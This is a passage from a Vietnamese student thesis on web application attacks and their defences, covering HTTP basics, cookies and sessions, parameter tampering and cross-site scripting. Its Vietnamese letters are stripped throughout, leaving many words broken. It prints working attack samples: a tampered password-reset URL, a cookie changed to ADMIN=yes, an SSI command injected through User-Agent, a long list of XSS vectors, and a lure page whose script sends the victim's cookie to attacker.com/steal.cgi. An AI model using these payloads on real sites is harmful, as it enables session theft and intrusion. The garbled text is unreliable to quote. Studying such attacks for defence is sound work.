Professional Documents
Culture Documents
Bao Mat Ung Dung Web Tren Internet - Diendandaihoc - VN - 08040603062011
Bao Mat Ung Dung Web Tren Internet - Diendandaihoc - VN - 08040603062011
Bao Mat Ung Dung Web Tren Internet - Diendandaihoc - VN - 08040603062011
B GIO DC V O TO TRNG I HC KHOA HC T NHIN TP.HCM KHOA CNG NGH THNG TIN B MN MNG MY TNH
LUN VN TT NGHIP
TI:
GVHD: Th.S. MAI VN CNG SVTH : NGUYN DUY THNG - 9912074 NGUYN MINH THU - 9912156
Khoa CNTT
Li cm n
Sau gn 6 thng n lc thc hin, lun vn nghin cu Cc k thut tn cng v bo mt ng dng Web trn Internet phn no hon thnh. Ngoi s c gng ht mnh ca bn thn, chng em nhn c s khch l rt nhiu t pha nh trng, thy c, gia nh v bn b. Trc ht chng con xin cm n ba m lun ng vin v to mi iu kin tt chng con hc tp v hon thnh lun vn tt nghip ny. Chng em xin cm n thy c trng i Hc Khoa Hc T Nhin truyn t nhng kin thc qu bu cho chng em trong sut qu trnh hc tp. c bit, chng em xin by t lng chn thnh su sc n thy Mai Vn Cng, ngi tn tnh hng dn v gip chng em trong qu trnh lm lun vn tt nghip. Xin cm n tt c bn b v ang ng vin, gip chng ti trong qu trnh hc tp v hon thnh tt lun vn tt nghip ny.
Khoa CNTT
Li nhn xt
Khoa CNTT
MC LC
GII THIU 7 T chc ca lun vn... 9 PHN TH NHT: C S L THUYT. 11 Chng 1: Gii thu ng dng Web.. 12 I. KHI NIM NG DNG WEB.. 13 II. M T HOT NG CA MT NG DNG WEB..... 16 Chng 2: Cc khi nim, thut ng lin quan .. 18 I. HACKER 19 II. HTTP HEADER... 19 III. SESSION. 21 IV. COOKIE.. 22 V. PROXY. 25 Chng 3: Gii thiu s lc v cc k thut tn cng ng dng Web.. 26 I. KIM SOT TRUY CP WEB 27 I.1. Thm nhp h thng qua ca sau.. 27 II. CHIM HU PHIN LM VIC... 27 II.1. n nh phin lm vic 27 II.2. nh cp phin lm vic. 27 III. LI DNG CC THIU ST TRONG VIC KIM TRA D LIU NHP HP L........ 27 III.1. Kim tra tnh ng n ca d liu bng ngn ng pha trnh duyt.... III.3. M ha URL.. III.5. Vt qua ng dn.. III.6. Chn m lnh thc thi trn trnh duyt nn nhn.. III.7. Thm cu lnh h thng.... 28 28 29 29 29 III.2. Trn b m... 28 III.4. K t Meta.. 28
Khoa CNTT
III.8. Chn cu truy vn SQL. III.9. Ngn ng pha my ch................................................................ III.10. K t rng.... III.11. Thao tc trn tham s truyn... IV. L THNG TIN. V. T CHI DCH V... Chng 4: Thao tc trn tham s truyn I. THAO TC TRN URL.. I.1. Khi nim.
30 30 30 30 31 31 34 35 35
I.2. Mt s bin php khc phc. 36 II. THAO TC TRN BIN N FORM. 36 II.1. Khi nim 36 II.2. Mt s bin php khc phc... III. THAO TC TRN COOKIE III.1. Khi nim . III.2. Mt s bin php khc phc.. IV.1. Khi nim.. 38 39 39 40 41
IV. THAO TC TRONG HTTP HEADER. 41 IV.2. Mt s bin php khc phc.. 42 Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Side Scripting). 43 I. K THUT TN CNG CROSS-SITE SCRIPTING (XSS)... 44 II. PHNG PHP TN CNG XSS TRUYN THNG... III. MT S WEBSITE TM THY L HNG XSS... IV. TN CNG XSS BNG FLASH. V. CCH PHNG CHNG I. KHI NIM SQL INJECTION... II. GII THIU M HNH C S D LIU... 46 50 51 54 57 57
Khoa CNTT
III. CC CCH TN CNG. III.1. K thut tn cng SQL Injection... III.2. Tn cng da vo cu lnh SELECT III.3. Tn cng da vo cu lnh HAVING... III.4. Tn cng da vo cu lnh kt hp UNION III.5. Tn cng da vo lnh INSERT... III.6. Tn cng da vo STORED PROCEDURE III.7. Nng cao... III.7.1. Chui k t khng c du nhy n. III.7.2. Tn cng 2 tng III.7.3. Trnh s kim sot... III.7.4. Dng Extended Stored Procedure III.7.4.1. Dng Extended Stored Procedure c sn trong h thng SQL Server... III.7.4.2. Dng Extended Stored Procedure t to. III.7.4.3. Nhp tp tin vn bn vo bng IV. CCH PHNG CHNG IV.1. Kim tra d liu.. IV.2. Kho cht SQL Server (SQL Server Lockdown)... Chng 7: Chim hu phin lm vic (Session Management) I. TNG QUAN V SESSION ID.. II. N NH PHIN LM VIC... II.1. Tn cng Session ID trn tham s URL II.2. Tn cng Session ID trong bin n form... II.3. Tn cng Session ID trong cookie. II.4. Cch phng chng. III. NH CP PHIN LM VIC.. III.1. Tn cng kiu d on phin lm vic (Prediction sessionID) III.2. Tn cng kiu vt cn phin lm vic (Brute force ID)... III.3. Tn cng kiu dng on m nh cp phin lm vic...
58 58 60 62 62 69 70 70 70 71 74 75 75 76 77 77 78 81 83 84 85 88 89 89 91 92 93 93 94
Khoa CNTT
III.4. Cch phng chng. III.5. S khc bit gia nh cp phin lm vic (session hijacking) v n nh phin lm vic (session fixation)... Chng 8: Trn b m (Buffer Overflow).. I. KHI NIM. II. S T CHC CA B NH. II.1. Stack... II.2. Push v Pop II.3. Cch lm vic ca hm.. II.4. Shell code... III. MT S CCH GY TRN B M QUA NG DNG WEB. IV. CC CCH PHNG CHNG. Chng 9: T chi dch v (DoS).
I. KHI NIM.. 109 II. NHNG KH NNG B TN CNG BNG DOS. 109 III. CC K THUT TN CNG.. III.1. Khi nim v Tcp bt tay ba chiu III.2. Li dng TCP thc hin phng php SYN flood truyn thng.. III.3. Tn cng vo bng thng.. III.3.1. Kiu tn cng th 1.. III.3.2. Kiu tn cng th 2.. III.4. Kiu tn cng vo ti nguyn h thng. IV. BIN PHP PHNG CHNG. Chng 10: Mt s k thut tn cng khc... I. M HA URL (URL Encoding) I.1. Khi nim I.2. Mt s bin php phng chng... II. KIU TN CNG VT NG DN II.1. Khi nim.. 110 110 112 113 113 113 117 117 119 120 120 121 121 121
Khoa CNTT
II.2. Mt s bin php phng chng.. III. TN CNG DA VO K T RNG... III.1. Khi nim.. III.2. Mt s bin php phng chng. IV. NGN NG PHA TRNH CH. IV.1. Khi nim.. IV.2. Cch tn cng IV.3. Bin php phng chng Chng 11: Tng kt qu trnh tn cng ca Hacker... I. THU THP THNG TIN MC H TNG CA MC TIU II. KHO ST NG DNG WEB III. TN CNG.. Chng 12: Tng kt cc bin php phng chng... I. VI NHNG NH QUN TR MNG II. VI NHNG NH THIT K NG DNG WEB. III. VI NGI S DNG NG DNG WEB... PHN TH BA: CHNG TRNH WEB CHECKER.. Chng 13: Chng trnh Web Checker.. I. C T CHNG TRNH WEB CHECKER.. I.1. Tng quan... I.2. Yu cu... I.2.1. Yu cu chc nng. I.2.1. Yu cu phi chc nng... II. KIN TRC CHNG TRNH WEB CHECKER.. II.1. Kin trc chng trnh Web Checker... II.2. Giao tip gia chng trnh vi trnh ch Web. III. CI T... III.1. Ngn ng ci t.. III.2. Phng php ci t.
122 123 123 123 123 123 125 125 127 128 131 132 134 135 137 139 140 141 142 142 142 142 143 143 143 144 145 145 145
Khoa CNTT
III.2.1. S dng m hnh giao din dng Dialog. III.2.2. S dng ActiveX Control (Microsoft Web Browser). III.2.3. S dng giao din lp trnh Window Socket 2 III.2.4. Mt s lp v hm chnh c ci t trong chng trnh. III.3. M t chng trnh v cch s dng III.3.1. Mn hnh chng trnh III.3.2. Cch s dng... IV. NH GI CHNG TRNH IV.1. Nhng vn t c.. IV.2. Nhng vn hn ch KT LUN... I. NHNG VN T C. II. HNG PHT TRIN. PH LC..
145 145 146 146 151 151 152 153 153 153 155 156 157 158
Khoa CNTT
GII THIU
Ngy nay, khi Internet c ph bin rng ri, cc t chc, c nhn u c nhu cu gii thiu thng tin ca mnh trn xa l thng tin cng nh thc hin cc phin giao dch trc tuyn. Vn ny sinh l khi phm vi ng dng ca cc ng dng Web ngy cng m rng th kh nng xut hin li v b tn cng cng cao, tr thnh i tng cho nhiu ngi tn cng vi cc mc ch khc nhau. i khi, cng ch n gin l th ti hoc a bn vi ngi khc. Cng vi s pht trin khng ngng ca Internet v cc dch v trn Internet, s lng cc v tn cng trn Internet cng tng theo cp s nhn. Trong khi cc phng tin thng tin i chng ngy cng nhc nhiu n nhng kh nng truy nhp thng tin ca Internet, th cc ti liu chuyn mn bt u cp nhiu n vn bo m v an ton d liu cho cc my tnh c kt ni vo mng Internet. Theo s liu ca CERT (Computer Emegency Response Team - "i cp cu my tnh"), s lng cc v tn cng trn Internet c thng bo cho t chc ny l t hn 200 vo nm 1989, khong 400 vo nm 1991, 1400 vo nm 1993, v 2241 vo nm 1994, v nm 2001 l 5315 v. Nhng v tn cng ny nhm vo tt c cc my tnh c mt trn Internet, cc my tnh ca tt c cc cng ty ln nh AT&T, IBM, cc trng i hc, cc c quan nh nc, cc t chc qun s, nh bng... Mt s v tn cng c quy m khng l (c ti 100.000 my tnh b tn cng). Hn na, nhng con s ny ch l phn ni ca tng bng. Mt phn rt ln cc v tn cng khng c thng bo, v nhiu l do, trong
-Trang 7-
Khoa CNTT
c th k n ni lo b mt uy tn, hoc n gin nhng ngi qun tr h thng khng hay bit nhng cuc tn cng ang nhm vo h thng ca h. in hnh l cuc tn cng vo phn mm thng mi ca IBM thng 3/2001, hai hacker tm thy l hng trn ng dng m bt c ai vi mt trnh duyt Web cng c th ly ti khon ca ngi dng, thm ch c ngi qun tr. Khng ch s lng cc cuc tn cng tng ln nhanh chng, m cc phng php tn cng ngy cng tinh vi v c t chc. Mt khc, vic qun tr cc h thng mng i hi nh qun tr h thng c kin thc v kinh nghim v h thng mng chc chn, do s yu km trong qun l s to nhiu iu kin cho cc hacker khai thc. Cng theo CERT, nhng cuc tn cng thi k 1988-1989 ch yu l on tn ngi s dng-mt khu (UserID/password) hoc s dng mt s li ca cc chng trnh v h iu hnh (security hole) lm v hiu h thng bo v, tuy nhin cc cuc tn cng vo thi gian gn y cn bao gm c cc thao tc nh gi mo a ch IP, theo di thng tin truyn qua mng, chim cc phin lm vic t xa (telnet hoc rlogin), ci trojan hay worm kim sot hay iu khin my tnhv th, nhu cu bo v thng tin trn Internet l cn thit nhm mc ch bo v d liu, bo v thng tin ngi dng v bo v h thng. Khi ni n vn bo mt, hu ht cc chuyn gia bo mt u ch trng n s an ton ca h thng mng v h iu hnh. bo v cho h thng, phng php thng c chn l s dng firewall. Tuy nhin, theo tuyn b ca CSI/FBI : 78% ni b hi c s dng firewall v 59% th b tn cng thng qua Internet, c th hn l theo bo co ca CSI/FBI Computer Crime v Security Survey th tng s thit hi do nhng ng dng Web b tn cng t nm 1997 n nm 2000 l 626 triu la M.
-Trang 8-
Khoa CNTT
Vi nhng cng c t ng tm l hng tuy gip rt nhiu cho nhng nh lp trnh Web nhng vn khng th ngn chn ton b v cng ngh Web ang pht trin nhanh chng (ch yu ch trng n yu t thm m, yu t tc ) nn dn n nhiu khuyt im mi pht sinh. S tn cng khng nm trong khun kh vi k thut pht hin, m linh ng v tng ln ty vo nhng sai st ca nh qun tr h thng cng nh ca nhng ngi lp trnh ng dng. Lun vn c thc hn vi mc ch tm hiu, phn tch cc l hng bo mt trong cc ng dng web (cng vi chng trnh minh ha) qua xut cc phng n sa cha. Song song , lun vn cn thc hin mt chng trnh T ng pht hin l hng trn ng dng Web gip ch cho nhng nh lp trnh Web t kinh nghim trnh nhng sai st trong qu trnh to cc ng dng.
T chc ca lun vn
Lun vn gm 13 chng chia thnh 3 phn: Phn th nht: C S L THUYT Phn ny gm c 3 chng: + Chng 1 : Gii thiu v ng dng Web + Chng 2 : Mt s khi nim, thut ng lin quan. + Chng 3: S lc cc k thut tn cng ng dng Web Phn th hai:CC K THUT TN CNG V BIN PHP PHNG CHNG Phn ny gm c 9 chng t chng 4 n chng 12 trong 7 chng u bn lun v cc k thut tn cng, cui mi chng l bin php phng chng cho tng k thut. Chng 11 ni v qu trnh tn cng ca hacker v n chng 12 l ni dung cc bin php phng chng chung nht.
-Trang 9-
Khoa CNTT
Phn th ba : CHNG TRNH WEB CHECKER L gm chng cui trnh by, gii thch v chng trnh Kt thc lun vn l phn kt lun, tm lc li nhng vn trnh by v mt s hng pht trin trong tng lai v danh mc cc ti liu tham kho.
-Trang 10-
Khoa CNTT
Phn I: C s l thuyt
PHN TH NHT
C S L THUYT
-Trang 11-
Khoa CNTT
Chng 1
-Trang 12-
Khoa CNTT
Lun vn c thc hin nhm tm hiu v cc k thut tn cng trang Web v ra cch phng chng. Do , trong chng u tin lun vn s gii thiu s lc mt s khi nim c bn v y chnh l nn tng xy dng ni dung cho nhng phn sau.
-Trang 13-
Khoa CNTT
Lp trnh by: Lp ny c nhim v hin th d liu cho ngi dng, ngoi ra cn c th c thm cc ng dng to b cc cho trang web. Lp ng dng: l ni x l ca ng dng Web. N s x l thng tin ngi dng yu cu, a ra quyt nh, gi kt qu n lp trnh by. Lp ny thng c ci t bng cc k thut lp trnh nh CGI, Java, .NET , PHP hay ColdFusion, c trin khai trn cc trnh ch nh IBM WebSphere, WebLogic, Apache, IIS Lp d liu: thng l cc h qun tr d liu (DBMS) chu trch nhim qun l cc file d liu v quyn s dng. M hnh ha hot ng ca mt ng dng Web:
-Trang 14-
Khoa CNTT
Trong : Trnh khch ( hay cn gi l trnh duyt): Internet Explorer, Netscap Navigator Trnh ch: Apache, IIS, . H qun tr c s d liu: SQL Server, MySQL, DB2, Access. Bn cnh , mt gii php dng bo v mt h thng mng thng c s dng l bc tng la, n c vai tr nh l lp ro chn bn ngoi mt h thng mng, v chc nng chnh ca firewall l kim sot lung thng tin gia cc my tnh. C th xem firewall nh mt b lc thng tin, n xc nh v cho php mt my tnh ny c c truy xut n mt my tnh khc hay khng, hay mt mng ny c c truy xut n mng kia hay khng. Ngi ta thng dng firewall vo mc ch: Cho php hoc cm nhng dch v truy xut ra ngoi.
-Trang 15-
Khoa CNTT
Cho php hoc cm nhng dch v t bn ngoi truy nhp vo trong. Kim sot a ch truy nhp, cm a ch truy nhp. Firewall hot ng da trn gi IP do kim sot vic truy nhp ca my ngi s dng
-Trang 16-
Khoa CNTT
li dng cc l hng Web m rng s tn cng ca mnh vo cc h thng khng lin quan khc.
-Trang 17-
Khoa CNTT
Chng 2
-Trang 18-
Khoa CNTT
I. HACKER
Hacker l mt thut ng dng chuyn ch nhng k ph hoi cc h thng mng Hacker thng l nhng chuyn gia v my tnh. Hacker khng to ra cc k h cho h thng, nhng hacker li l nhng ngi am hiu v h iu hnh, h qun tr d liu, cc ngn ng lp trnhH s dng kin thc ca mnh trong vic tm ti v khai thc cc l hng ca h thng mng. Mt s hacker ch dng li vic pht hin v thng bo li tm c cho nhng nh bo mt hay ngi pht trin chng trnh, h c xem nh l WhiteHat (Hacker nn trng). Mt s hacker da vo nhng l hng thc hin vic khai thc tri php nhm mc ch ph hoi hay mu li ring, nhng ngi ny b xem nh l BlackHat (Hacker nn en). V tnh cht ph bin ca thut ng hacker, nn trong phn trnh by, lun vn s s dng hacker thay cho k tn cng.
II.HTTP HEADER
HTTP header l phn u (header) ca thng tin m trnh khch v trnh ch gi cho nhau. Nhng thng tin trnh khch gi cho trnh ch c gi l HTTP requests (yu cu) cn trnh ch gi cho trnh khch l HTTP responses (tr li). Thng thng, mt HTTP header gm nhiu dng, mi dng cha tn tham s v gi tr. Mt s
-Trang 19-
Khoa CNTT
tham s c th c dng trong c header yu cu v header tr li, cn s khc th ch uc dng ring trong tng loi. V d : Header yu cu:
GET /tintuc/homnay.asp HTTP/1.1 Accept: */* Accept-Language: en-us Connection: Keep-Alive Host: localhost Referer: http://localhost/lienket.asp User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Accept-Encoding: gzip, deflate
Dng u l dng yu cu cho bit phng thc yu cu (GET hoc POST), a ch yu cu (/tintuc/homnay.asp) v phin bn HTTP (HTTP/1.1)..
o Tip theo l cc tham s. Chng hn nh: Accept-Language: Cho bit ngn ng dng trong trang web. Host: Cho bit a ch ca my ch. Referer: Cho bit a ch ca trang web tham chiu ti. o Header ca HTTP request s kt thc bng mt dng trng. Header tr li:
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 13 Jul 2000 05:46:53 GMT
-Trang 20-
Khoa CNTT
Content-Length: 2291 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQGGGNCG=LKLDFFKCINFLDMFHCBCBMFLJ; path=/ Cache-control: private <HTML> <BODY> ...
o Dng u l dng trng thi, cho bit phin bn HTTP c dng (HTTP/1.1), m trng thi (200) v trng thi (OK). o Tip theo l cc tham s. o Tip theo l mt dng trng bo hiu kt thc header, tip theo l phn thn ca HTTP response. Danh sch tham s ca HTTP header c trnh by trong ph lc A
III. SESSION
HTTP l giao thc hng i tng tng qut, phi trng thi, ngha l HTTP khng lu tr trng thi lm vic gia trnh duyt vi trnh ch. S thiu st ny gy kh khn cho mt s ng dng Web, bi v trnh ch khng bit c trc trnh duyt c nhng trng thi no. V th, gii quyt vn ny, ng dng Web a ra mt khi nim phin lm vic (Session). Cn SessionID l mt chui chng thc phin lm vic. Mt s trnh ch s cung cp mt SessionID cho ngi dng khi h xem trang web trn trnh ch. duy tr phin lm vic th sessionID thng c lu vo :
-Trang 21-
Khoa CNTT
Bin trn URL Bin n form Cookie Phin lm vic ch tn ti trong mt khong thi gian cho php, thi gian ny c cu hnh qui nh ti trnh ch hoc bi ng dng thc thi. Trnh ch s t ng gii phng phin lm vic khi phc li ti nguyn ca h thng.
IV. COOKIE
Cookie l nhng phn d liu nh c cu trc c chia s gia trnh ch v trnh duyt ca ngi dng. Cc cookie c lu tr di nhng file d liu nh dng text, c ng dng to ra lu tr/truy tm/nhn bit cc thng tin v ngi dng gh thm trang Web v nhng vng m h i qua trong trang. Nhng thng tin ny c th bao gm tn/nh danh ngi dng, mt khu, s thch, thi quen...cookie c trnh duyt ca ngi dng chp nhn lu trn a cng ca my mnh, tuy nhin khng phi lc no trnh duyt cng h tr cookie, m cn ty thuc vo ngi dng c chp nhn chuyn lu tr hay khng. nhng ln truy cp sau n trang Web , ng dng c th dng li nhng thng tin trong cookie (nh thng tin lin quan n vic ng nhp vo Yahoo Messenger!...) m ngi dng khng phi lm li thao tc ng nhp hay phi cung cp li cc thng tin khc. Cookie c phn lm 2 loi secure/non-secure v persistent/non-persistent do ta s c 4 kiu cookie l:
-Trang 22-
Khoa CNTT
Persistent v Secure Persistent v Non-Secure Non-Persistent v Secure Non-Persistent v Non-Secure Persistent cookies c lu tr di dng tp tin .txt (v d trnh duyt Netscape Navigator s lu cc cookie thnh mt tp tin cookie.txt cn Internet Explorer s lu thnh nhiu tp tin *.txt trong mi tp tin l mt cookie) trn my khch trong mt khon thi gian xc nh. Non-persistent cookie th c lu tr trn b nh RAM ca my khch v s b hy khi ng trang web hay nhn c lnh hy t trang web. Secure cookies ch c th c gi thng qua HTTPS (SSL). Non-Secure cookie c th c gi bng c hai giao thc HTTPS hay HTTP. Thc cht l i vi secure cookie th trnh ch s cung cp ch truyn bo mt. Cc thnh phn ca mt cookie gm:
Domain www.redhat. com Flag FALSE Path / Secure FALSE Expiration 1154029490 Name Apache Value 64.3.40.151.16 018996349247 480
-Trang 23-
Khoa CNTT
Flag: mang gi tr TRUE/FALSE -Xc nh cc my khc vi cng tn min c c truy xut n cookie hay khng. Path: Phm vi cc a ch c th truy xut cookie. V d: Nu path l /tracuu th cc a ch trong th mc /tracuu cng nh tt c cc th mc con ca n nh /tracuu/baomat c th truy xut n cookie ny. Cn nu gi tri l / th cookie s c truy xut bi tt c a ch thuc min trang web to cookie. Sercure: mang gi tr TRUE/FALSE - Xc nh y l mt secure cookie hay khng ngha l kt ni c s dng SSL hay khng. Expiration: thi gian ht hn ca cookie, c tnh bng giy k t 00:00:00 gi GMT ngy 01/01/1970. Nu gi tr ny khng c thit lp th trnh duyt s hiu y l non-persistent cookie v ch lu trong b nh RAM v s xo n khi trnh duyt b ng. Name: Tn bin (trong trng hp ny l Apache) Value: Vi cookie c to trn th gi tr ca Apache l 64.3.40.151.16018996349247480 v ngy ht hn l 27/07/2006, ca tn min http://www.redhat.com. V d chui lnh trong HTTP header di y s to mt cookie:
Set-Cookie:Apache="64.3.40.151.16018996349247480"; path="/"; domain="www.redhat.com"; path_spec; expires="2006-07-27 19:39:15Z"; version=0
-Trang 24-
Khoa CNTT
Cc cookies ca IE c lu thnh nhiu tp tin, mi tp tin l mt cookie v c t trong [C:]\Documents and Setting\[username]\Cookies (Win2000), i vi win9x, th mc cookies nm trong th mc [C:]\Windows\cookies. Kch thc ti a ca cookie l 4kb. S cookie ti a cho mt tn min l 20 cookie. Cookie b hy ngay khi ng trnh duyt gi l session cookie.
V. PROXY
Proxy cung cp cho ngi s dng truy xut Internet nhng nghi thc t bit hoc mt tp nhng nghi thc thc thi trn dual_homed host hoc basion host. Nhng chng trnh client ca ngi s dng s qua trung gian proxy server thay th cho server tht s m ngi s dng cn giao tip. Proxy server xc nh nhng yu cu t client v quyt nh p ng hay khng p ng, nu yu cu c p ng, proxy server s kt ni vi server tht thay cho client v tip tc chuyn tip nhng yu cu t client n server, cng nh tr li ca server n client. V vy proxy server ging cu ni trung gian gia server v client.
-Trang 25-
Khoa CNTT
Chng 3
III. Li dng cc thiu st trong vic kim tra d li hp hp l IV. l thng tin V. T chi dch v
-Trang 26-
Khoa CNTT
Sau y l cc khi nim s lc cc k thut tn cng ng dng Web c phn loi da trn mc gy tc hi i vi ng dng.
-Trang 27-
Khoa CNTT
L k thut tn cng cho php hacker mo danh ngi dng hp l sau khi nn nhn ng nhp vo h thng bng cch gii m session ID ca h c lu tr trong cookie hay tham s URL, bin n ca form.
-Trang 28-
Khoa CNTT
S dng nhng k t c bit ( ni r hn trong phn ph lc) hacker c th chn thm vo d liu gi nhng k t trong chui cu lnh nh <script> trong k thut XSS, -- trong SQL. thc thi cu lnh.
-Trang 29-
Khoa CNTT
III.11. Thao
tc
trn
tham
truyn
(Parameter
manipulation)
Nhng thng tin trao i gia trnh ch v trnh duyt c lu tr trong nhng bin nh bin trn URL, bin n form, cookieBi v vic kim sot bin cha
-Trang 30-
Khoa CNTT
c quan tm ng mc nn hacker c th li dng sa i gi tr bin nh cp phin lm vic ca ngi dng hay thay i gi tr mt mn hng.
-Trang 31-
Khoa CNTT
Trn b m T chi dch v Mt vi k thut khc o K t rng o M ha URL o Li dng truy xut ng dn n mt tp tin o Ngn ng pha trnh ch
-Trang 32-
Khoa CNTT
PHN TH HAI
-Trang 33-
Khoa CNTT
Chng 4
-Trang 34-
Khoa CNTT
Thao tc trn tham s truyn l k thut thay i thng tin quan trng trn cookie, URL hay bin n ca form. K thut Cross-Site Scripting, SessionID, SQL Injection, Buffer Overflowcng cn dng n cc tham s ny hon thin cc bc tn cng ca hacker. C th ni cc tham s truyn l u mi cho mi hot ng ca hacker trong qu trnh tn cng ng dng. V th y l ni dung chng u tin c cp trong phn th hai, mc ch cng l h tr tt hn phn trnh by cc chng k tip.
Vi: + username l tn ngi cn thay i mt khu. + newpass l mt khu mi cho username Tuy nhin, bng cch thay i tham s nh sau:
-Trang 35-
Khoa CNTT
http://www.nganhang.com/example?user=admin&newpass=111111
-Trang 36-
Khoa CNTT
th yu cu s thay i:
POST /cuahang.pl HTTP/1.0 ... giaca=0.99
Ngoi vic thay i ni dung bin n ca form, hacker cn bin i ni dung cc thnh phn trong form, nh chiu di ca mt nhp d liu thc hin vic tn cng BUFFER OVERFLOW,
-Trang 37-
Khoa CNTT
II.2.
Ch nn s dng bin n ca form hin th d liu trn trnh duyt, khng c s dng gi tr ca bin thao tc trong x l ng dng. Dng bin HTTP_REFERER kim tra ngun gc ca yu cu gi n, tuy nhin hacker c th s dng Proxy che du ngun gc thc ca n, v vy cng khng nn qu tin tng bin HTTP_REFERER kim tra. Ghp tn v gi tr ca bin n thnh mt chui n. S dng thut ton m ho MD5 hoc mt kiu hash mt chiu khc tng hp chui v lu n vo mt hidden field gi l Chui mu. Khi gi tr trong form c gi i, cc thao tc nh trn c thc hin li vi cng mt kho m ta nh trc. Sau em so snh vi Chui mu, nu chng khng khp nhau th chng t gi tr trong biu mu b thay i. Dng mt sessionID tham chiu n thng tin c lu tr trn c s d liu.
-Trang 38-
Khoa CNTT
Cookie xc nh ngi dng ny khng phi l Admin (ADMIN=no), nhng nu hacker thay i trng ny iu g s xy ra? Hacker c th thay i li thnh nh sau:
Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;
-Trang 39-
Khoa CNTT
-Trang 40-
Khoa CNTT
khng. Tuy nhin, hacker c th t vit mt chng trnh iu khin HTTP header (nh xem ni dung, to mi) hay s dng cc proxy min ph cho php thay i d liu c gi t trnh duyt. Ngoi ra hacker c th tn cng trc tip bng cch telnet gi HTTP Request n trnh ch. V d 4.IV.1-1:
su-2.05# telnet localhost 80 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET / HTTP/1.0 Referer: www.redhat.com/login.asp User-Agent: <!--#exec cmd="/bin/id"--> HTTP/1.1 200 OK Date: Mon, 17 Dec 2001 20:39:02 GMT Server: Connection: close Content-Type: text/html
Phn in m l ni dung hacker thay i. V d 4.IV.1-2: Referer header cha URL ca trang web m t yu cu c gi i. V th mt vi ng dng s kim tra thnh phn ny trong header m bo rng n c gi t trang web ca ng dng . Vic lm ny dng ngn chn vic hacker lu li trang web xung my, chnh sa thuc tnh form, ph hoi bng cch nhm vo client side validate hay server side include, sau gi i. Nhng phng php kim tra ny s tht bi khi hacker c th sa li Referer header n ging nh c gi t trang web hp l.
-Trang 41-
Khoa CNTT
Referer: www.redhat.com/login.asp
Nhn xt:
Mi thng tin quan trng trao i gia trnh duyt v trnh ch khng nn lu tr di dng chui thng thng m cn c m ha, ngoi ra nhng thng tin ny nn c kim tra, i chiu vi d liu trong c s d liu hay trong cache ca trnh ch, phng trnh trng hp ni dung thng tin b sai lch. Bn cnh , vic kim tra d liu ng n l cn thit v hu nh cc k thut tn cng u da vo d liu nhp trn URL, bin n form hay cookie nh kiu tn cng Cross-Site Scripting trong chng k tip hay SQL Injection trong chng 6
-Trang 42-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
Chng 5
III. Mt s WebSite tm thy l hng XSS. IV. Tn cng XSS bng Flash. V. Cch phng chng.
-Trang 43-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
CHNG 5: CHN M LNH THC THI TRN TRNH DUYT NN NHN (CROSS SITE SCRIPTING)
-Trang 44-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
hay: http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_te
xt=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Phn in m l on m c thm vo vi mc ch nh cp cookies ca nn nhn. Trong nhng v d 2.I-1 trn, hu ht nhng tin t URL l a ch ca nhng ng dng Web c tht (VD: http://www.microsoft.com/education, http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/...) li dng cch truyn tham s trn URL m hacker c th d dng thm vo on m nh cp cookie. V d 5.I-1 trn ch minh ha mt cch n gin l thm on m ca mnh vo trang Web thng qua URL. Nhng thc s th c rt nhiu cch thm on m JavaScript vi mc ch tn cng kiu XSS. Hacker c th d dng li dng Document Object Model (DOM) thay i ng cnh v ni dng Web ng dng. Sau y l danh sch ni c th chn on m: V d 5.I-2:
<a href="javascript#[code]"> <div onmouseover="[code]"> <img src="javascript:[code]"> <img dynsrc="javascript:[code]"> <input type="image" dynsrc="javascript:[code]"> <bgsound src="javascript:[code]"> &<script>[code]</script> &{[code]}; <img src=&{[code]};> <lin kt rel="stylesheet" href="javascript:[code]"> <iframe src="vbscript:[code]"> <img src="mocha:[code]">
-Trang 45-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
<img src="livescript:[code]"> <a href="about:<script>[code]</script>"> <meta http-equiv="refresh" content="0;url=javascript:[code]"> <body onload="[code]"> <div style="background-image: url(javascript:[code]);"> <div style="behaviour: url([lin kt to code]);"> <div style="binding: url([lin kt to code]);"> <div style="width: expression([code]);"> <style type="text/javascript">[code]</style> <object classid="clsid:..." codebase="javascript:[code]"> <script>[code]</script> <img src="blah"onmouseover="[code]"> <img src="blah>" onmouseover="[code]"> <xml src="javascript:[code]"> <xml id="X"><a><b><script>[code]</script>;</b></a></xml> (ti liu t http://online.securityfocus.com/archive/1/272037/2002-05-09/2002-05-15/0)
-Trang 46-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
Tm tt cc bc thc hin: Bc 1: Hacker bit c ngi dng ang s dng mt ng dng Web c l hng XSS. Bc 2: Ngi dng nhn c 1 lin kt thng qua email hay trn chnh trang Web (nh trn guestbook, banner d dng thm 1 lin kt do chnh hacker to ra). Thng thng hacker khin ngi dng ch bng nhng cu kch thch s t m ca ngi dng nh Kim tra ti khon, Mt phn thng hp dn ang ch bn Bc 3: Chuyn ni dung thng tin (cookie, tn, mt khu) v my ch ca hacker. Bc 4: Hacker to mt chng trnh cgi ( v d 3 ny l steal.cgi) hoc mt trang Web ghi nhn nhng thng tin nh cp vo 1 tp tin Bc 5: Sau khi nhn c thng tin cn thit, hacker c th s dng thm nhp vo ti khon ca ngi dng.
-Trang 47-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
V d 5.II-1: khai thc l hng trn ng dng hotwired.lycos.com, hacker c th thc hin nh sau :
<html> <head> <title>Look at this!</title> </head> <body> <a href="http://hotwired.lycos.com/webmonkey/index1.html?tw=<script>do cument.location.replace('http://www.attacker.com/steal.cgi?'+docume nt.cookie);</script>"> Mt phn thng hp dn ang ch bn </a> </body> </html>
